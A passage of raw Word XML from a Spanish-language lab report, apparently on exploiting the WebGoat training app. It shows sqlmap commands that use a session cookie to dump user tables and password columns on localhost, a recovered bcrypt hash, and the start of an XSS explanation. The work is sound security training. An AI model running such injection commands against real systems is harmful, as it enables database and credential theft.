          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>jordan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">" --cookie="JSESSIONID=XxeqSdWmcFB4waehaTxo3iXhNKogw32y1tat7XL1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BE2EA40" w14:textId="77777777" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68785759" w14:textId="19A7DD45" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://localhost:8080/app/usersearch --data="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>jordan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">" --cookie="JSESSIONID=XxeqSdWmcFB4waehaTxo3iXhNKogw32y1tat7XL1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQLite_masterdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57E04E12" w14:textId="77777777" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54841E3D" w14:textId="7678F4A8" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://localhost:9090/app/usersearch --data="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>jordan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">" --cookie="JSESSIONID=XxeqSdWmcFB4waehaTxo3iXhNKogw32y1tat7XL1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlite_sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>name,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F3F423B" w14:textId="77777777" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721136D1" w14:textId="06163B33" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>De lo cual se obtiene la siguiente información:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1970E138" w14:textId="77777777" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tres tablas denominadas (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlite_sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) demostrando la vulnerabilidad ya mencionada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194ECDF0" w14:textId="79411131" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un usuario y una contraseña (en formato Hash) ($2a$10$JtmatI3klvYLUrtwykGVxu6toV4x5FHak5rREruQoLIbuyYibW5GG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD1805" w14:textId="77777777" w:rsidR="00934311" w:rsidRPr="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0304805D" w14:textId="77777777" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C07B19C" w14:textId="46100832" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2075A219" wp14:editId="319F4468">
            <wp:extent cx="5612130" cy="2950845"/>
            <wp:effectExtent l="0" t="0" r="762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2950845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70174BC4" w14:textId="4397574A" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368E849F" wp14:editId="6600B11B">
            <wp:extent cx="5612130" cy="257365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2573655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC7CBD" w14:textId="31000C22" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4206A1F6" wp14:editId="2EB00016">
            <wp:extent cx="5612130" cy="269367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2693670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE3A68" w14:textId="043C6D85" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE9CC9F" wp14:editId="7570E8C6">
            <wp:extent cx="5612130" cy="95377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953770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC88AD0" w14:textId="3606090B" w:rsidR="001E06D8" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36502595" wp14:editId="28C8CC73">
            <wp:extent cx="5612130" cy="424815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248150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFB176" w14:textId="189B8194" w:rsidR="001E06D8" w:rsidRPr="00E562D3" w:rsidRDefault="00C22B5E" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="00AB27B3" w:rsidRPr="00E562D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423C004" w14:textId="4DE11778" w:rsidR="003563E4" w:rsidRDefault="00AB27B3" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El XSS ocurre cuando una aplicación web permite </w:t>
      </w:r>
      <w:r w:rsidR="00F427E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que un atacante inyecte código</w:t>
      </w:r>
      <w:r w:rsidR="003563E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript malicioso en una </w:t>
      </w:r>
      <w:r w:rsidR="001C2992">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>página</w:t>
      </w:r>
      <w:r w:rsidR="003563E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> visitada por otros usuarios. Esto sucede porque la entrada proporcionada por el usuario no es correctamente valida antes de mostrarse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64754A24" w14:textId="36CA889C" w:rsidR="00F51014" w:rsidRDefault="003563E4" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En WebGoat, se simula este ataque permitiendo que el usuario inyecte scripts en campos de entrada o URL. El impacto de esta vulnerabilidad puede incluir el robo de cookies de sesión, redirección a sitios maliciosos o la manipulación de contenido mostrado a otros usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7A583" w14:textId="5BC54816" w:rsidR="003563E4" w:rsidRDefault="003563E4" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6B685B" w14:textId="7B3A1ABD" w:rsidR="003563E4" w:rsidRDefault="003563E4" w:rsidP="003563E4">
